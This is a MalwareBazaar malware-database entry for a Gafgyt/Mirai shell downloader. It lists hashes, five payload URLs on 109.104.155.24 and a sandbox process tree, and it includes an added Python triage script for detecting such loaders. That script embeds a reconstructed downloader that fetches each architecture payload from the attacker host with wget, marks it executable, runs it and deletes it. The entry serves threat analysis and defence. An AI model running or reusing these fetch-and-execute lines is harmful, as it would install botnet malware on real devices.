MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 84c3deee171c8ee76b04757d2ba862f4eb5152cebf0fb25dd2913d22c1fd0e4b. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Gafgyt
Vendor detections: 7

SHA256 hash: 84c3deee171c8ee76b04757d2ba862f4eb5152cebf0fb25dd2913d22c1fd0e4b
SHA3-384 hash: a868fdb057b1588f3be94cb8e2b63f0d9f77a5b00257d2acabe05e63c05a1477839293c77c0dc96d397b90aea66537b4
SHA1 hash: 4c4246b4aedd99cf280af5ab165bb81f1f013b0e
MD5 hash: 7be10eb8c4fb555c471043d7d71012f1
humanhash: beryllium-king-lima-charlie
File name: uni
Signature: Gafgyt
File size: 640 bytes
First seen: 2026-01-28 16:28:18 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 12:CLJoZDSLJhHWsLsySLshHWsLPBzvSLPBzMHWsLPnIjDSLPnIMHWsLPiDSLPDHWJ:CCZeTWsw5wRWs9z69zGWszJzhWsGeXWJ
TLSH: T112F0E8EF00B14C6D1244FA0AF9E20E78A80A69DD58C50F4C5F8F3C39788D9187835FA8
Magika: txt
Reporter: abuse_ch
Tags: sh
URLs found in this sample, with the payload each one served (URL and SHA256 were run together in the original table; the split is at the 64-hex-character hash):

URL                          Malware sample (SHA256 hash)                                        Signature  Tags
http://109.104.155.24/mips   e21b7bea60a9530514cc047e69acc0a4f8fcd4aa0b0b740b44420536df8db05d    Gafgyt     32-bit elf gafgyt Mozi
http://109.104.155.24/mpsl   10a7aff25c88eb3fb4ce17dbdd1d78e941b3c4696935f2843afae1a7403c73d3    Mirai      elf mirai ua-wget
http://109.104.155.24/arm4   ac0de66ad392299c321c00db0b0f010ff5d63a18392364b8f07ea8da4f94c52f    Mirai      elf mirai ua-wget
http://109.104.155.24/arm5   5a2f439cbeb1481de5ee95086d4119fbf28a8d8b89ae9a93ee9dd45472cf5f78    Mirai      elf mirai ua-wget
http://109.104.155.24/arm7   fefec7b2d044fee96b0d7315c1a648a64c78fd6cbb1753c7d90e027676379e7e    Mirai      elf mirai ua-wget

Intelligence

File Origin
# of uploads: 1
# of downloads: 61
Origin country: DE

Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: base64 bash busybox evasive lolbin mirai
Status: terminated
Behavior Graph (process tree recovered from the sandbox graph dump):

  /usr/bin/sudo (pid 3147)
  `-- execve -> /tmp/sample.bin (pid 3153)
        repeated five times, once per payload:
        |-- clone  -> /usr/bin/dash  -> execve -> /usr/bin/wget   [net, send-data, write-file]
        |                                          -> 109.104.155.24:80, send: 133 B
        |-- execve -> /usr/bin/chmod
        |-- clone  -> /usr/bin/dash
        `-- execve -> /usr/bin/rm                                  [delete-file]

  wget pids 3155, 3343, 3495, 3607, 3762 (each sends 133 B to 109.104.155.24:80 and writes a file);
  chmod pids 3334, 3486, 3600, 3747, 3926; rm pids 3341, 3492, 3605, 3757, 3931.
  Five fetch/chmod/rm rounds match the five payload URLs (mips, mpsl, arm4, arm5, arm7) listed above.
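The process tree above is the loop every multi-architecture IoT downloader runs: fetch one payload per CPU architecture with wget, chmod it, try to run it, delete it, move on to the next. The Python below is an added example, not the sample's code and not part of the MalwareBazaar page: it statically triages a shell script of that shape, extracts the URLs, hosts and staged file names as IOCs, and flags the fetch -> chmod -> execute -> rm chain. The DOWNLOADER text it runs on is constructed from the five URLs listed on this page and the process chain in the graph; it is not the contents of the 640-byte sample. `triage_script`, `Triage` and the BENIGN control script are the example's own names.

```python
"""Static triage of a multi-architecture IoT downloader shell script.

Added example, not the sample's own code and not MalwareBazaar's.  It models
the behaviour the sandbox process graph shows for this entry (wget -> chmod ->
execute -> rm, once per architecture payload, all from 109.104.155.24) and
returns the IOCs a responder would block or hunt for.
"""
import re
import shlex
from dataclasses import dataclass, field
from urllib.parse import urlparse

FETCHERS = {"wget", "curl"}          # next-stage fetchers common on BusyBox devices
URL_SCHEMES = ("http://", "https://", "ftp://", "tftp://")

# Constructed from the URLs on this page; NOT the real sample's contents.
DOWNLOADER = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://109.104.155.24/mips -O mips; chmod +x mips; ./mips; rm -rf mips
wget http://109.104.155.24/mpsl -O mpsl; chmod +x mpsl; ./mpsl; rm -rf mpsl
wget http://109.104.155.24/arm4 -O arm4; chmod +x arm4; ./arm4; rm -rf arm4
wget http://109.104.155.24/arm5 -O arm5; chmod +x arm5; ./arm5; rm -rf arm5
wget http://109.104.155.24/arm7 -O arm7; chmod +x arm7; ./arm7; rm -rf arm7
"""

# Constructed control: one fetch, nothing chmod'ed, executed or removed.
BENIGN = """#!/bin/sh
wget https://example.com/app.tar.gz -O app.tar.gz
tar xzf app.tar.gz
"""


@dataclass
class Triage:
    urls: list[str] = field(default_factory=list)
    hosts: set[str] = field(default_factory=set)
    staged: set[str] = field(default_factory=set)      # files written by a fetcher
    executable: set[str] = field(default_factory=set)  # files passed to chmod
    executed: set[str] = field(default_factory=set)    # staged files later run
    removed: set[str] = field(default_factory=set)     # files passed to rm

    @property
    def downloader_pattern(self) -> bool:
        """A fetched file that is chmod'ed, run and then deleted: the classic IoT loader."""
        return bool(self.staged & self.executable & self.executed & self.removed)

    @property
    def multi_arch(self) -> bool:
        """Several distinct payloads from a single host is the per-architecture spray."""
        return len(self.staged) >= 3 and len(self.hosts) == 1


def _basename(path: str) -> str:
    return path.rstrip("/").rsplit("/", 1)[-1]


def _commands(script: str):
    """Yield each simple command as a token list (split on newlines, ';', '&&', '||').

    Variable expansion, loops and quoting corner cases are deliberately ignored:
    this is a first-pass triage, not a shell interpreter.
    """
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for piece in re.split(r"\s*(?:;|&&|\|\|)\s*", line):
            try:
                toks = shlex.split(piece)
            except ValueError:          # unbalanced quotes: fall back to whitespace split
                toks = piece.split()
            if toks:
                yield toks


def triage_script(script: str) -> Triage:
    t = Triage()
    for toks in _commands(script):
        cmd, args = _basename(toks[0]), toks[1:]
        if cmd == "busybox" and args:            # "busybox wget ..." is the same fetch
            cmd, args = args[0], args[1:]
        if cmd in FETCHERS:
            out, url = None, None
            for i, a in enumerate(args):
                if a.startswith(URL_SCHEMES):
                    url = a
                # wget -O/-qO <file>, curl -o <file>; curl -O takes no argument
                elif (cmd == "wget" and a.startswith("-") and a.endswith("O")) or a == "-o":
                    if i + 1 < len(args):
                        out = args[i + 1]
            if url:
                t.urls.append(url)
                t.hosts.add(urlparse(url).hostname or "")
                t.staged.add(_basename(out or urlparse(url).path))  # wget default name
        elif cmd == "chmod":
            operands = [a for a in args if not a.startswith("-")]
            t.executable.update(_basename(f) for f in operands[1:])  # operands[0] is the mode
        elif cmd == "rm":
            t.removed.update(_basename(a) for a in args if not a.startswith("-"))
        elif cmd in t.staged:                    # e.g. "./mips" after it was fetched
            t.executed.add(cmd)
    return t


if __name__ == "__main__":
    r = triage_script(DOWNLOADER)
    print("hosts:", sorted(r.hosts))
    print("payloads:", sorted(r.staged))
    print("fetch->chmod->exec->rm:", r.downloader_pattern, "multi-arch:", r.multi_arch)
```

A pass like this is a cheap pre-filter before sandboxing: `hosts` goes straight to a blocklist, `urls` to the proxy logs, and the staged names (mips, mpsl, arm4, ...) line up with the payload table above so the dropped ELF samples can be pulled by hash.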
Verdict: Malicious
Threat: Trojan-Downloader.Shell.Agent
Threat name: Linux.Downloader.Generic

Status: Suspicious
First seen: 2026-01-28 16:24:38 UTC
File Type: Text (Shell)
AV detection: 10 of 36 (27.78%)
Threat level: 3/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
  Modifies registry class
  Suspicious use of SetWindowsHookEx
  Enumerates physical storage devices
The three behaviours in this result are Windows-specific indicators (registry and Win32 API activity) and do not describe what a POSIX shell script does on the Linux/BusyBox targets it is written for; weigh them accordingly and rely on the Linux process tree above for this sample's actual behaviour.
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: ach_202412_suspect_bash_script
Author: abuse.ch
Description: Detects suspicious Linux bash scripts

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download

Signature: Gafgyt
File type: sh
SHA256 hash: 84c3deee171c8ee76b04757d2ba862f4eb5152cebf0fb25dd2913d22c1fd0e4b (this sample)